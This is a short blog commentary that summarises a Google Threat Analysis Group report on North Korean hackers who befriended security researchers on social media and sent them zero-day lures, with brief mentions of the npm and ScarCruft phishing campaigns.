DailyPost 2542

Cyber security researchers being targets themselves would certainly be an eyeopener for the world, which keeps on patting itself, as if some bland laws and ineffective investigation would change anything. We live in a cyber ripped world where ignorance has for the first time become real bliss. A recent report elaborates the way North Korean hackers have exploited zero-day bug to target cyber security researchers. They continue to target the cyber security community “using a zero-day bug in an unspecified software over past several weeks to infiltrate their machines.”

The reliability of it comes from the fact that the findings come from Google’s Threat Analysis Group, which found their fake accounts on social media platforms like X and Mastodon. This was being done with the purpose of forging false relationships, and build trust with the potential targets. They have gone to the extent of months long conversation with a security researcher on topics of mutual interest. The initial contact happened over X and they moved to the encrypted messaging apps. This fascinating social engineering exercise ultimately paved the way to conduct the real task. It was a malicious file containing at least one zero day in a popular software package.

What does the payload do? It performs a number of anti-virtual machine checks. Then the critical information is transmitted, with screenshot, to an attacker controlled server. The account in question was active at least since Oct 2022. The threat actor even went on to the extent of releasing proof-of-concept (PoC) “exploit code for high-severity privilege escalation flaws in the Windows Kernel.” Not strangely, this is not the first time North Korean hackers “leveraged collaboration-themed lures to infect victims.” In a similar manner in July 2023 GitHub had disclosed details of an npm campaign. The target was invited by the threat actor to collaborate on a GitHub repository. He also convinced the “target to clone and execute its contents.”

Google TAG also found a tool named “GetSymbol” developed by attackers hosted on GitHub. It was hosted as a potential secondary infection vector. It has been forked 23 times. For the North Korean hackers this is not all, they have become participants in war. The one in question in this report is North Korean nation state actor known as ScarCruft. This hacking outfit “is leveraging LNK file lures in phishing emails to deliver a backdoor capable of harvesting sensitive data and executing malicious instructions. To believe none of this is happening in India for lack of focused research in this area in like living in the wonderland.

Sanjay Sahay

Have a nice evening.

Leave a Comment

Your email address will not be published. Required fields are marked *

The reCAPTCHA verification period has expired. Please reload the page.

Scroll to Top